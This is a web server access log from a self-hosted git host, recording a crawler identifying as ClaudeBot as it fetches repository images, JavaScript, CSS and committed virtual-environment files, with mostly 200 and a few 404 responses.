"/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:44:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 9890] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:44:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png?display=rendered" [Client 216.73.216.188] [Length 10894] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:44:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 9890] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:44:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:44:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:45:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png?display=rendered" [Client 216.73.216.188] [Length 10896] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:45:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom4.png?display=rendered" [Client 216.73.216.188] [Length 10896] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:45:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom5.png?display=rendered" [Client 216.73.216.188] [Length 10895] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:45:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:45:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:45:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 9891] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:45:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 9896] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:45:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom6.png?display=rendered" [Client 216.73.216.188] [Length 10904] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:45:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 9894] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:45:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 9886] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:45:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom4.png?display=rendered" [Client 216.73.216.188] [Length 10904] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:45:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:46:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom6.png?display=rendered" [Client 216.73.216.188] [Length 10903] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:46:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 9889] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:46:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:46:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:46:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom6.png?display=rendered" [Client 216.73.216.188] [Length 10895] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:46:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom1.png?display=rendered" [Client 216.73.216.188] [Length 10897] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:46:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:46:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:46:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom5.png?display=rendered" [Client 216.73.216.188] [Length 10890] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:46:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom4.png?display=rendered" [Client 216.73.216.188] [Length 10895] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:46:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom1.png?display=rendered" [Client 216.73.216.188] [Length 10901] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:46:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:47:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 9896] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:47:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 9895] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:47:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 9891] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:47:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:47:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 9897] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:47:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png?display=rendered" [Client 216.73.216.188] [Length 10898] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:47:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom5.png?display=rendered" [Client 216.73.216.188] [Length 10901] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:47:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:48:59 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/%7Bitem.href%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:50:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:50:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 9890] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:50:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom1.png?display=rendered" [Client 216.73.216.188] [Length 10899] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:53:12 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/%7Bitem.href%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:32:02 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/robots.txt" [Client 216.73.216.188] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:32:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/js/app.js?display=rendered" [Client 216.73.216.188] [Length 10996] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:32:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/js/app.js" [Client 216.73.216.188] [Length 11073] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:33:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/js/app.js" [Client 216.73.216.188] [Length 9945] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:33:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/js/app.js?display=source" [Client 216.73.216.188] [Length 22041] [Gzip 6.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:33:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/css/style.css" [Client 216.73.216.188] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:33:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/css/style.css" [Client 216.73.216.188] [Length 5772] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:33:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/css/style.css?display=source" [Client 216.73.216.188] [Length 20100] [Gzip 7.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:34:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3" [Client 216.73.216.188] [Length 16] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:34:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3?display=source" [Client 216.73.216.188] [Length 11085] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:34:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/css/style.css?display=rendered" [Client 216.73.216.188] [Length 10997] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:34:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3" [Client 216.73.216.188] [Length 9945] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:34:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3.12?display=source" [Client 216.73.216.188] [Length 11083] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:35:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3.12" [Client 216.73.216.188] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:35:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3.12" [Client 216.73.216.188] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:35:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/normalizer?display=source" [Client 216.73.216.188] [Length 11565] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:35:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt" [Client 216.73.216.188] [Length 9914] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:35:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fnpm%2Fletsencrypt" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:35:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate?display=rendered" [Client 216.73.216.188] [Length 10989] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:36:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3?display=rendered" [Client 216.73.216.188] [Length 11014] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:36:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3.12?display=rendered" [Client 216.73.216.188] [Length 11013] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:36:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/normalizer" [Client 216.73.216.188] [Length 277] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:36:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate?display=source" [Client 216.73.216.188] [Length 13009] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:37:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate" [Client 216.73.216.188] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:37:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/normalizer" [Client 216.73.216.188] [Length 9935] [Gzip 2.85] 